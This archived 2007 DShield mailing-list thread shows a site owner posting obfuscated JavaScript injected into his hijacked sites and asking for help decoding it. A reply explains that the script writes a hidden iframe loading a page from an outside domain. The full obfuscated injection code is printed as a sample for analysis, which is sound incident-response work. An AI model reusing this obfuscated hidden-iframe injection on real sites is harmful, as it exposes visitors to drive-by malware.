[Dshield] need help decoding.

Skyler.Bingham at londen-insurance.com Skyler.Bingham at londen-insurance.com
Wed Sep 19 03:23:36 GMT 2007





The Javascript writes to the following to your page:

</textatea></textarea><IFRAME src="http :// marcobernardoni.com
/x/index.php" width=3 height=3 style="display:none"></IFRAME>

I have added spaces to the URL to prevent it from being followed
accidentally, but the "</textatea>" typo is the Javascript author's.  The
page referenced in the URL above does not appear to be valid any longer.

HTH,

Skyler Bingham
skyler.bingham at londen-insurance.com
(602) 957-1650 x1139


                                                                           
             Dan Jackson                                                   
             <kybowhunter515 at y                                             
             ahoo.com>                                                  To 
             Sent by:                  list at lists.dshield.org              
             list-bounces at list                                          cc 
             s.dshield.org                                                 
                                                                   Subject 
                                       [Dshield] need help decoding.       
             09/18/2007 05:18                                              
             PM                                                            
                                                                           
                                                                           
             Please respond to                                             
              General DShield                                              
              Discussion List                                              
             <list at lists.dshie                                             
                  ld.org>                                                  
                                                                           
                                                                           




Recently several of my sites got hijacked and below is the code that
was inserted, what I'm trying to do is to decode it to figure out what
it's intent was and to see if it opened up any other holes in the
server that I need to know about.



Maybe this is easy stuff... but I don't have a clue where to start ...




Code: ( text )

<script
language='JavaScript'>function nbsp() {var t,o,l,i,j;var
s='';s+='06004711610112011609711610109706206004711
6101120116097114101097062';
s+='0600730700820650770690321151140990610341041161
16112058047047109097114099111098101114110097114100
111';s=s+'1101050460991111090471200471051101001011
20046112104112034032119105100116104061051032104101
105103104';s=s+'1160610510321151161211081010610341
00105115112108097121058110111110101034062060047073
070082065077069';s=s+'062032';t='';l=s.length;i=0;
while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(Str

ing.fromCharCode(t));t='';}}nbsp();</script><!-- c4 -->






any help would be greatly appreciated.



TIA.
_________________________________________
SANS Network Security 2007 in Las Vegas September 22-30. 39 courses,
SANS top instructors.  http://www.sans.org/info/9346


This e-mail and files transmitted with it are confidential, and are
intended solely for the use of the individual or entity to whom this e-mail
is addressed.  If you are not the intended recipient, or the employee or
agent responsible to deliver it to the intended recipient, you are hereby
notified that any dissemination, distribution or copying of this
communication is strictly prohibited.  If you are not one of the named
recipient(s) or otherwise have reason to believe that you received this
message in error, please immediately notify security at londen-insurance.com
 by e-mail, and destroy the original message.  Thank You.



More information about the list mailing list